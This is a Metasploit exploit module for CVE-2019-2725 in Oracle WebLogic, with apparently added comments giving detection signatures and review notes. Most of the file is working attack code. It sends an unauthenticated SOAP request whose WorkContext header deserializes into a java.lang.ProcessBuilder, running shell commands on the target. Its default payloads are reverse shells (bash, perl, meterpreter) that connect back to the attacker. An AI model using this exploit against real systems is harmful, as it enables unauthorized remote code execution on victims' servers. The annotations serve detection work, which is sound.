##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Exploit module for the issue listed under 'References' (CVE-2019-2725): a SOAP
  # request to the WebLogic AsyncResponseService endpoint whose <work:WorkContext>
  # header carries a java.lang.ProcessBuilder object graph.
  #
  # This module only speaks HTTP (HttpClient mixin, RPORT 7001). The 'Description'
  # string mentions the T3 interface, which nothing in this code touches --
  # NOTE(review): the description presumably means the HTTP/SOAP interface; confirm
  # before relying on it for asset scoping.
  #
  # Detection / mitigation notes grounded in what this module actually sends:
  #   * POST to TARGETURI (default '/_async/AsyncResponseService') with
  #     Content-Type 'text/xml' and an empty SOAPAction header -- both #check and
  #     #exploit do this.
  #   * The exploit body wraps <void class="java.lang.ProcessBuilder"> ... and
  #     <void method="start"/> inside a <work:WorkContext> header element; a
  #     ProcessBuilder reference inside a SOAP header is the high-signal string
  #     to alert on in WAF / access-log review.
  #   * 'SideEffects' => IOC_IN_LOGS below: every request, including the
  #     unauthenticated #check probe, lands in the target's HTTP access log.
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Powershell

  # Registers module metadata (targets, references, notes) and the two options
  # the module reads: RPORT (default 7001) and TARGETURI.
  #
  # @param info [Hash] base info hash supplied by the framework
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ',
        'Description' => %q{
          An unauthenticated attacker with network access to the Oracle Weblogic Server T3
          interface can send a malicious SOAP request to the interface WLS AsyncResponseService
          to execute code on the vulnerable host.
        },
        'Author' => [
          'Andres Rodriguez - 2Secure (@acamro) <acamro[at]gmail.com>', # Metasploit Module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2019-2725'],
          ['URL', 'http://www.cnvd.org.cn/webinfo/show/4999'],
          ['URL', 'https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html'],
          ['URL', 'https://twitter.com/F5Labs/status/1120822404568244224']
        ],
        'Privileged' => false,
        'Platform' => %w[unix win solaris],
        # Target names below are matched literally by the `case target.name` in #exploit.
        'Targets' => [
          [
            'Unix',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
            }
          ],
          [
            'Windows',
            {
              'Platform' => 'win',
              'Arch' => [ARCH_X64, ARCH_X86],
              'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }
            }
          ],
          [
            'Solaris',
            {
              'Platform' => 'solaris',
              'Arch' => ARCH_CMD,
              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' },
              'Payload' => {
                'Space' => 2048,
                'DisableNops' => true,
                'Compat' =>
                {
                  'PayloadType' => 'cmd',
                  'RequiredCmd' => 'generic perl telnet'
                }
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          # NOTE(review): presumably the time the framework waits for the reverse
          # payload to connect back, since the server only ever answers 202 --
          # confirm against the framework's WfsDelay handling.
          'WfsDelay' => 12
        },
        'DisclosureDate' => '2019-04-23',
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          # The probe and exploit requests are plain HTTP POSTs and are logged by the server.
          'SideEffects' => [ IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION ]
        }
      )
    )

    register_options(
      [
        Opt::RPORT(7001),
        OptString.new('TARGETURI', [true, 'URL to AsyncResponseService', '/_async/AsyncResponseService'])
      ]
    )
  end

  # Fingerprints the endpoint without sending the ProcessBuilder graph: a POST with
  # no 'data' to TARGETURI, Content-Type text/xml, empty SOAPAction.
  #
  # @return [Exploit::CheckCode]
  #   Vulnerable -- HTTP 500 whose body contains '<faultcode>env:Client</faultcode>'
  #   Safe       -- any other response that is not HTTP 202
  #   Unknown    -- no response at all, or HTTP 202 (the server accepted the request
  #                 and gave nothing to classify from)
  # Branch order matters: the `res.nil?` arm is reached only after the two arms that
  # require `res` to be truthy, so a nil response cannot raise NoMethodError here.
  def check
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path),
      'method' => 'POST',
      'ctype' => 'text/xml',
      'headers' => { 'SOAPAction' => '' }
    )

    if res && res.code == 500 && res.body.include?('<faultcode>env:Client</faultcode>')
      vprint_status("The target returned a vulnerable HTTP code: /#{res.code}")
      # Only the first line of the body is echoed; the full fault is not printed.
      vprint_status("The target returned a vulnerable HTTP error: /#{res.body.split("\n")[0]}")
      Exploit::CheckCode::Vulnerable
    elsif res && res.code != 202
      vprint_status('The target returned a non-vulnerable HTTP code')
      Exploit::CheckCode::Safe
    elsif res.nil?
      vprint_status('The target did not respond in an expected way')
      Exploit::CheckCode::Unknown
    else
      # Reached only for HTTP 202: the probe alone cannot tell patched from unpatched.
      vprint_status("The target returned HTTP code: #{res.code}")
      vprint_status("The target returned HTTP body: #{res.body.split("\n")[0]} [...]")
      Exploit::CheckCode::Unknown
    end
  end

  # Builds the per-target command vector, embeds it in a SOAP envelope whose
  # WorkContext header describes a java.lang.ProcessBuilder, POSTs it, and treats
  # HTTP 202 as the only acceptable reply. Success is not observable from the HTTP
  # response itself; the module relies on the selected reverse payload connecting back.
  #
  # @raise via fail_with -- Failure::Disconnected if the socket is reset while sending,
  #   Failure::Unreachable if no response arrives, Failure::UnexpectedReply for any
  #   status other than 202.
  def exploit
    print_status('Generating payload...')
    # No `else` arm: target.name always matches one of the three 'Targets' entries
    # registered in #initialize, so the three locals are always assigned.
    case target.name
    when 'Windows'
      string0_cmd = 'cmd.exe'
      string1_param = '/c'
      shell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true, encoded: false })
    when 'Unix', 'Solaris'
      string0_cmd = '/bin/bash'
      string1_param = '-c'
      shell_payload = payload.encoded
    end

    # Randomised wsa:Action / wsa:RelatesTo values: these vary per run, so a
    # detection rule should not key on them -- key on the WorkContext/ProcessBuilder
    # structure instead.
    random_action = rand_text_alphanumeric(20)
    random_relates = rand_text_alphanumeric(20)

    soap_payload = %(<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/")
    soap_payload << %(xmlns:wsa="http://www.w3.org/2005/08/addressing")
    soap_payload << %(xmlns:asy="http://www.bea.com/async/AsyncResponseService">)
    soap_payload << %(<soapenv:Header>)
    soap_payload << %(<wsa:Action>#{random_action}</wsa:Action>)
    soap_payload << %(<wsa:RelatesTo>#{random_relates}</wsa:RelatesTo>)
    # Everything from here to </work:WorkContext> is the object graph the server
    # deserialises; this is the stable signature for log review.
    soap_payload << %(<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">)
    soap_payload << %(<void class="java.lang.ProcessBuilder">)
    soap_payload << %(<array class="java.lang.String" length="3">)
    soap_payload << %(<void index="0">)
    soap_payload << %(<string>#{string0_cmd}</string>)
    soap_payload << %(</void>)
    soap_payload << %(<void index="1">)
    soap_payload << %(<string>#{string1_param}</string>)
    soap_payload << %(</void>)
    soap_payload << %(<void index="2">)
    # String#encode(xml: :text) escapes &, < and > so the command cannot break the
    # surrounding XML; the commented line below is the earlier helper-based form.
    soap_payload << %(<string>#{shell_payload.encode(xml: :text)}</string>)
    # soap_payload << %Q|<string>#{xml_encode(shell_payload)}</string>|
    soap_payload << %(</void>)
    soap_payload << %(</array>)
    soap_payload << %(<void method="start"/>)
    soap_payload << %(</void>)
    soap_payload << %(</work:WorkContext>)
    soap_payload << %(</soapenv:Header>)
    soap_payload << %(<soapenv:Body>)
    soap_payload << %(<asy:onAsyncDelivery/>)
    soap_payload << %(</soapenv:Body>)
    soap_payload << %(</soapenv:Envelope>)

    print_status('Sending payload...')

    begin
      res = send_request_cgi(
        'uri' => normalize_uri(target_uri.path),
        'method' => 'POST',
        'ctype' => 'text/xml',
        'data' => soap_payload,
        'headers' => { 'SOAPAction' => '' }
      )
    rescue Errno::ENOTCONN
      # Only ENOTCONN is handled; other socket errors propagate to the framework.
      fail_with(Failure::Disconnected, 'The target forcibly closed the connection, and is likely not vulnerable.')
    end

    if res.nil?
      fail_with(Failure::Unreachable, 'No response from host')
    # `res &&` is redundant after the nil guard above; harmless.
    elsif res && res.code != 202
      fail_with(Failure::UnexpectedReply, "Exploit failed. Host responded with HTTP code #{res.code} instead of HTTP code 202")
    end
  end
end